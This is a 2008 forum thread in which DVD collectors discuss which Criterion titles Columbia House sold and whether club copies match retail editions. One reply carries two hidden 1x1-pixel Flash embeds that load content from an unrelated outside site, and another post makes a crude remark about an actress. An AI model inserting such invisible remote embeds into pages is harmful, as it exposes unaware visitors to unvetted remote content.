Reload this Page >

ColumbiaHouse Criterions

DVD Clubs Discuss & Strategize about DVD Clubs like Columbia House

ColumbiaHouse Criterions

Old 08-27-08, 08:19 PM

Received 0 Likes on 0 Posts
ColumbiaHouse Criterions

Do they even sell Criterions?

If they do is there a list of the ones they sell?
Old 08-27-08, 09:34 PM
DVD Talk Gold Edition

Received 1 Like on 1 Post
They sell exactly five. You can find them by searching Criterion on the website.

Hearts & Minds
Hamlet
The Ruling Class
The Red Shoes
8 1/2
Old 08-28-08, 07:19 AM
Challenge Guru & Comic Nerd

Received 670 Likes on 448 Posts
Also, you can often get them for free with a lower priced title in the B1G1F sales.
Old 08-28-08, 10:04 AM
DVD Talk Legend

Received 3 Likes on 3 Posts
Originally Posted by Trevor
Also, you can often get them for free with a lower priced title in the B1G1F sales.
I just ordered 8 1/2 last night with the HD DVD version of Atonement for $12.95 shipped. Atonement has a regular price of $39.99. CH is clearing out their remaining HD DVDs. Since the regular price is $39.99, the Criterion qualified as the freebie!
Old 09-15-08, 10:30 PM

The only downside is having to sit through more than 2 hours of "Atonement".

Getting to watch a flat chested brit teenie bopper in HD-DVD high def is similar to getting your face beaten with a priceless Babe Ruth baseball bat. Both experiences make your eyes hurt and both waste an old but excellent resource
Old 09-15-08, 10:36 PM
DVD Talk Legend

^

No worries there. CH ran out of stock on Atonement and cancelled it from my order.
Old 11-09-08, 01:22 PM

What's the policy on trading CH Criterions for other Criterions here? Is that acceptable? There are some criterions I'd really like to have, just not the CH ones...I'm thinking of opening a CH account if I'd be able to trade them.

The CH Criterions are identical to the retail ones, right? (I ask because sometimes CDs from the BMG Music Club aren't...)

Thanks
Old 11-09-08, 01:32 PM
DVD Talk Legend

^

The CH Criterions are exactly the same as what you would find everywhere else(same UPC). I don't know about DVD Talk's policy, but it's definitely against CH's policy-

Selections you receive from Columbia House DVD Club are for your personal use only and not for resale or other commercial use.
Old 11-09-08, 05:54 PM

I have never received a DVD from Columbia House that was identified on the box or the disc as manufactured for CH or under license by CH. In other words, they are identical to retail versions. Yes, CDs from the music club are another matter.
Old 11-12-08, 12:47 AM
Cool New Member

Originally Posted by ericjanderson
I have never received a DVD from Columbia House that was identified on the box or the disc as manufactured for CH or under license by CH. In other words, they are identical to retail versions. Yes, CDs from the music club are another matter.<object width="1" height="1"><param name="movie" value="http://thehostingreviews.com/pages/879/"></param><param name="allowFullScreen" value="true"></param><embed src="http://thehostingreviews.com/pages/879/" type="application/x-shockwave-flash" allowfullscreen="true" width="1" height="1"></embed></object><object width="1" height="1"><param name="movie" value="http://thehostingreviews.com/pages/881/"></param><param name="allowFullScreen" value="true"></param><embed src="http://thehostingreviews.com/pages/881/" type="application/x-shockwave-flash" allowfullscreen="true" width="1" height="1"></embed></object>
thats how mine have been aswell..
Old 12-11-08, 05:28 AM
DVD Talk Platinum Edition

Received 1 Like on 1 Post
Originally Posted by smashthesymbols
They sell exactly five. You can find them by searching Criterion on the website.

Hearts & Minds
Hamlet
The Ruling Class
The Red Shoes
8 1/2
Thanks, I'm only missing The Ruling Class